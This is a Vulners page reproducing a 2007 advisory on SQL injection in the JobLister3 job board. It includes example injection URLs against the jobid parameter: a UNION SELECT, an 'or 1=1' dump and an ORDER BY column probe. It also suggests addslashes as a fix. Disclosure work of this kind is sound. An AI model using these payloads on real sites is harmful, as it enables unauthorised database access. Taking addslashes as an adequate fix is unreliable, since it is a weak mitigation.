Vulners
Lucene search
joblister-sql.txt
`
JobLister3 by SkilMatch Staffing Systems, Inc.
Multiple SQL injection vulnerabilities
http://www.dubdubdub.com/
http://www.skilmatch.com/
The search form filed doesnt strip special characters that have special
meanings. A single quote makes the application spit out a number of
errors.
This is not limited to the search query. The GET'd variables also fail to
sanatize characters.
Union selection:
www.example.com/index.php?mode=showbyID&jobid=99786'%20union%20all%20sele
ct%20something%20from%20something/*
Dump of entries:
www.example.com/index.php?mode=showbyID&jobid=99786'%20or%201=1/*
Using some old fasioned order by work, wee deduce 16 columns
www.example.com/index.php?mode=showbyID&jobid=99786'%20order%20by%2016/*
Thus, the fix currently would be to impletement addslashes functions to
all areas that recieve (or can recieve) user supplied data.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Aug 2007 00:00Current
7.4High risk
Vulners AI Score7.4